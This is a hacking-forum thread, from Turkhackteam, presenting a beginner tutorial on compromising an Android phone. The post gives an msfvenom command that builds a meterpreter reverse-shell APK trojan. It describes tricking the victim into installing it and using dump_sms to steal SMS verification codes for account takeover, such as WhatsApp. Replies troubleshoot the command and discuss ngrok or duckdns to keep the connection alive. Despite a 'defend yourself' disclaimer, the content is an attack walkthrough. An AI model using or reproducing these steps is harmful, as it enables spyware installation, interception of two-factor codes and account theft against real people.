Metasploit & Penetration Test (DEMO)

'pump

Junior Hunter
9 Ara 2022
1,328
2,839
Ağ Kablolarında Geziyor
Hello friends today I will show you how to hack a mobile phone.

(
basic level 101 ) 🎓
metasploit-framework-logo.svg

Note ⚠️ :
I do not accept responsibility !
Responsibility belongs to the person !

GCZS6c.png


Let's Build Our Trojan
msfvenom -p android/meterpreter/reverse_tcp LHOST=You_ip_address LPORT=random -o trojenname.apk (enter)
7slammw.png


GCZS6c.png



Our virus appears on the desktop

o8rec4g.png

GCZS6c.png



we are listening to the virus

h3h4oj2.png


GCZS6c.png


The enemy opened the virus. our connection has arrived

iuifv8n.png



GCZS6c.png


Social Engineering
conversations are mine.
we will fool our target application with this method.
Find your opponent's weak nesses. :)

TN_examplesoscialengineering.jpg


95bnqkq.jpg




GCZS6c.png


☠️ Let's move on to the infiltration ☠️

am2qoxx.png

(The picture is a quote.
I put it as an example !)


infiltration process
now how do we get these sms

15gs0nq.png


"
dump_sms"

the file will go to the desktop

361feh3.png


and the code came to us.
Now we can enter the platform.
actually easier for whatsapp.

GCZS6c.png



NOTE

Please do not abuse this.


I'm just telling you to defend yourself.



Lütfen bunu kötüye kullanmayın.



Sana sadece kendini savunmanı söylüyorum.




Bu konuda size az çok bilgisayar korsanların sanal dolandırıcıların en basit örneklerinden birini siz gösterdim.

Bu konudan çıkarılacak ders, her önünüze gelen şeyi indirmeyin.

İndirmeden önce virüstotal gibi sitelere taratın.

Araştırın.






Sağlıcakla kalın İyi Forumlar.

Goodbye, Good Forums.

🇹🇷






800px-T%C3%BCrkHackTeam_Logo.png


Hoşunuza Gideceğini Düşündüğüm Seri.

The Series I Think You'll Enjoy.



" What is Linux?

PowerShell

OS "




 
Son düzenleme:

ACHERONN

Üye
7 Şub 2023
150
60
Hello friends today I will show you how to hack a mobile phone.

(
basic level 101 ) 🎓
metasploit-framework-logo.svg

Note ⚠️ :
I do not accept responsibility !
Responsibility belongs to the person !

GCZS6c.png


Let's Build Our Trojan
msfvenom -p android/meterpreter/reverse_tcp LHOST=You_ip_address LPORT=random -o trojenname.apk (enter)
7slammw.png


GCZS6c.png



Our virus appears on the desktop

o8rec4g.png

GCZS6c.png



we are listening to the virus

h3h4oj2.png


GCZS6c.png


The enemy opened the virus. our connection has arrived

iuifv8n.png



GCZS6c.png


Social Engineering
conversations are mine.
we will fool our target application with this method.
Find your opponent's weak nesses. :)

TN_examplesoscialengineering.jpg


95bnqkq.jpg




GCZS6c.png


☠️ Let's move on to the infiltration ☠️

am2qoxx.png

(The picture is a quote.
I put it as an example !)


infiltration process
now how do we get these sms

15gs0nq.png


"
dump_sms"

the file will go to the desktop

361feh3.png


and the code came to us.
Now we can enter the platform.
actually easier for whatsapp.

GCZS6c.png



NOTE

Please do not abuse this.


I'm just telling you to defend yourself.



Lütfen bunu kötüye kullanmayın.



Sana sadece kendini savunmanı söylüyorum.




Bu konuda size az çok bilgisayar korsanların sanal dolandırıcıların en basit örneklerinden birini siz gösterdim.

Bu konudan çıkarılacak ders, her önünüze gelen şeyi indirmeyin.

İndirmeden önce virüstotal gibi sitelere taratın.

Araştırın.






Sağlıcakla kalın İyi Forumlar.

Goodbye, Good Forums.

🇹🇷






800px-T%C3%BCrkHackTeam_Logo.png


Hoşunuza Gideceğini Düşündüğüm Seri.

The Series I Think You'll Enjoy.



" What is Linux?

PowerShell

OS "




Nice topic
 

teux

Katılımcı Üye
23 Ocak 2023
929
1,223
Genç Atsızlar
Hello friends today I will show you how to hack a mobile phone.

(
basic level 101 ) 🎓
metasploit-framework-logo.svg

Note ⚠️ :
I do not accept responsibility !
Responsibility belongs to the person !

GCZS6c.png


Let's Build Our Trojan
msfvenom -p android/meterpreter/reverse_tcp LHOST=You_ip_address LPORT=random -o trojenname.apk (enter)
7slammw.png


GCZS6c.png



Our virus appears on the desktop

o8rec4g.png

GCZS6c.png



we are listening to the virus

h3h4oj2.png


GCZS6c.png


The enemy opened the virus. our connection has arrived

iuifv8n.png



GCZS6c.png


Social Engineering
conversations are mine.
we will fool our target application with this method.
Find your opponent's weak nesses. :)

TN_examplesoscialengineering.jpg


95bnqkq.jpg




GCZS6c.png


☠️ Let's move on to the infiltration ☠️

am2qoxx.png

(The picture is a quote.
I put it as an example !)


infiltration process
now how do we get these sms

15gs0nq.png


"
dump_sms"

the file will go to the desktop

361feh3.png


and the code came to us.
Now we can enter the platform.
actually easier for whatsapp.

GCZS6c.png



NOTE

Please do not abuse this.


I'm just telling you to defend yourself.



Lütfen bunu kötüye kullanmayın.



Sana sadece kendini savunmanı söylüyorum.




Bu konuda size az çok bilgisayar korsanların sanal dolandırıcıların en basit örneklerinden birini siz gösterdim.

Bu konudan çıkarılacak ders, her önünüze gelen şeyi indirmeyin.

İndirmeden önce virüstotal gibi sitelere taratın.

Araştırın.






Sağlıcakla kalın İyi Forumlar.

Goodbye, Good Forums.

🇹🇷






800px-T%C3%BCrkHackTeam_Logo.png


Hoşunuza Gideceğini Düşündüğüm Seri.

The Series I Think You'll Enjoy.



" What is Linux?

PowerShell

OS "




The topic of health is good for you.
 
Son düzenleme:

cyber251

Üye
24 Nis 2023
71
17
nice topic, can you explain the -p parameter in msfvenom btw?
 
Moderatör tarafında düzenlendi:

'pump

Junior Hunter
9 Ara 2022
1,328
2,839
Ağ Kablolarında Geziyor
nice topic, can you explain the -p parameter in msfvenom btw?
The p parameter is specifying which operating system will create the trojan.
Example: -p windows/meterpreter..
Example : -p andorid/meterpreter..

Note: I guess it doesn't just specify the operating system, We can also change the listening protocol.
 

milliyetçi_31

Yeni üye
5 May 2023
20
5
hello , im typing like -p android/meterpreter/reverse_tcp and the " -f apk " but there is a problem help me what do i do wrong
 

'pump

Junior Hunter
9 Ara 2022
1,328
2,839
Ağ Kablolarında Geziyor
hello , im typing like -p android/meterpreter/reverse_tcp and the " -f apk " but there is a problem help me what do i do wrong


Dude, first of all keep your Kali linux up to date. As for the main problem, you said -f, not -f, we write -o, name our trojan and end it with .apk extension.

Of course, before that, we write our host, that is, our local ip address, and create a port.

good forums...
 

milliyetçi_31

Yeni üye
5 May 2023
20
5
Dude, first of all keep your Kali linux up to date. As for the main problem, you said -f, not -f, we write -o, name our trojan and end it with .apk extension.

Of course, before that, we write our host, that is, our local ip address, and create a port.

good forums...
i have one more question, now i threw the trojan but every second it shuts down, i keep pressing the trojan's application image on the phone to reconnect it, do you know anything to keep it stable?
 

'pump

Junior Hunter
9 Ara 2022
1,328
2,839
Ağ Kablolarında Geziyor
i have one more question, now i threw the trojan but every second it shuts down, i keep pressing the trojan's application image on the phone to reconnect it, do you know anything to keep it stable?
.
We need to create a backdoor so that the connection does not close, so when the adversary connects the phone to the Internet, the connection will drop again, and of course we will also need to fix the rope, we can use ngrok or duckdns for this.
 

milliyetçi_31

Yeni üye
5 May 2023
20
5
We need to create a backdoor so that the connection does not close, so when the adversary connects the phone to the Internet, the connection will drop again, and of course we will also need to fix the rope, we can use ngrok or duckdns for this.
There is already a backdoor , I'm already doing it on my own phone with ngrok. here is when i type exploit, auto drops after 60 seconds, something troublesome
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.